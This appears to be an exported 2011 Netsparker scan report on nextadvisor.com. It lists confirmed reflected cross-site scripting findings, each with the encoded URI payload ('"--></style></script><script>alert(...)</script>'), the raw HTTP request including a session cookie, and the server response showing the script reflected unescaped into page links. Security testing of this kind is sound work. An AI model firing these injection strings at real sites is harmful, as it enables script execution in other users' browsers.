- /web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000387)%3C/script%3E

/web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000387)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000387)</script>

Request

GET /web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/web_hosting/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8443
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", web hosts, web hosting, best web host, web hosting reviews, web hosting ratings, webhosting, domain registration, domain name registration, HostGator, Hostmonster, Yahoo! Small Business, Myhosting.com, Lunarpages, 1&1 Web Hosting, BlueHost, iPage, FatCow, Just Host, Dreamhost, Web Hosting Pad, HostPapa, IX Web Hosting, InMotion Web Hosting, Register.com, Intuit Web Hosting, GoDaddy" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/web_hosting/'"--></style></script><script>netsparker(0x000387)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000387)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a><span class="nav_border">|</span> <a href="reportcard.php">Report Card</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/web_hosting_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Web Hosting FAQ</h1> <p>Frequently Asked Questions about Web Hosting</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Web Hosting:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="web_hosting"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog201004..
- /credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00039A)%3C/script%3E

/credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00039A)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ene..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00039A)</script>

Request

GET /credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/credit_report_monitoring/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6651
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", credit report, free credit report, free credit score, fico score, credit report monitoring, credit monitoring, credit scores, credit scoring, credit services, FICO, Identity Guard, Trusted ID, Equifax Complete, ProtectMyID.com, CreditCheck Total, FreeCreditScore.com, True Credit 3-Bureau" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/credit_report_monitoring/'"--></style></script><script>netsparker(0x00039A)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00039A)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/credit_report_monitoring_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Credit Report Monitoring FAQ</h1> <p>Frequently Asked Questions about Credit Report Monitoring</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Credit Report Monitoring:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="credit_report_monitoring"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog2010..
- /aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%3C/script%3E

/aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003B9)</script>

Request

GET /aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003B9)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:43 GMT
